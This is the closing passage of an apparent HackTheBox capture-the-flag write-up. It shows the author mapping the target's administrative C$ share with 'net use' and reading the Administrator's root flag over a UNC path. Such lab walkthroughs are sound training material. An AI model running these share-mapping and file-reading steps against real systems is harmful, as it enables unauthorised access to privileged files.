Access is denied.

But after trying diffeent possiblilities, I found that its possible to map the C$.

C:\Users>net use Z: \\10.10.10.130\C$
net use Z: \\10.10.10.130\C$
C:\Users>Z:
Z:

Z:\>dir
dir
 Volume in drive Z has no label.
 Volume Serial Number is FA90-3873

 Directory of Z:\

02/03/2019  06:30 PM    <DIR>          inetpub
09/15/2018  12:49 PM    <DIR>          PerfLogs
02/03/2019  09:29 AM    <DIR>          Program Files
09/15/2018  02:36 PM    <DIR>          Program Files (x86)
02/01/2019  09:56 AM    <DIR>          tomcat
02/03/2019  06:54 PM    <DIR>          Users
02/03/2019  06:09 PM    <DIR>          Windows
               0 File(s)              0 bytes
               7 Dir(s)   7,410,044,928 bytes free

So, now I can access Administrator folder and read root flag.

C:\Users>type \\10.10.10.130\C$\Users\Administrator\Desktop\root.txt
type \\10.10.10.130\C$\Users\Administrator\Desktop\root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Thanks for reading. 🙂

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
Sorry, that action is blocked.